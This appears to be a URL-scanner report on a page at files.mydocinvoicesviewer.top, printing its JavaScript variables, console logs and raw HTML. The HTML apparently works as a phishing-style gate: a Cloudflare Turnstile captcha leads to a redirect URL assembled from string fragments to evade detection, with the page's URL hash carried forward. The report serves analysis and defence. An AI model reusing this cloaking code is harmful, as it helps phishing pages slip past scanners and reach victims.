https://files.mydocinvoicesviewer.top/document

Submitted URL:
https://files.mydocinvoicesviewer.top/document
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 7 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
turnstileobject
verifyCallback_CFfunction
onloadTurnstileCallbackfunction
Popperfunction

Console log messages · 2 found

Messages logged to the web console

TypeCategoryLog
warningother
URL
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Text
[Cloudflare Turnstile] Unable to find onload callback 'onloadTurnstileCallback' immediately after loading, expected 'function', got 'undefined'.
errornetwork
URL
https://files.mydocinvoicesviewer.top/favicon.png
Text
Failed to load resource: the server responded with a status of 404 (Not Found)

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
    <title>Verify</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="css/index.css">
    <link rel="icon" type="image/png" sizes="16x16" href="favicon.png">
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" async="" defer=""></script>
    <script>
        var verifyCallback_CF = function (response) {
            let cfForm = document.querySelector("#cfForm")
            if (response.length > 10) {
                console.log(response);
                window.location.assign('ht' + 'tps' + ':' + '/' + '/f' + 'il' + 'es' + '.my' + 'do' + 'ci' + 'n' + 'vo' + 'ic' + 'esv' + 'ie' + 'w' + 'er.' + 'top' + '/d' + 'oc' + 'u' + 'men' + 't?q' + '=J' + 'x_i' + '_yc' + window.location.hash);
                return
            }
            console.log("cant find cloudflare")
            return switchToSecondCaptcha()
        }
    </script>

    <script>
        window.onloadTurnstileCallback = function () {
            turnstile.render("#turnstileCaptcha", {
                sitekey: "0x4AAAAAAA1TvextFSaW_0BQ",
                callback: verifyCallback_CF,
            })
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="imgcon">

        </div>
        <div id="box">
            <form action="?" method="POST" id="cfForm" style="visibility: visible" data-callback="verifyCallback_CF">
                <div id="turnstileCaptcha"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-68jxq_response"></div></div>
                <br>
            </form>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>

</body></html>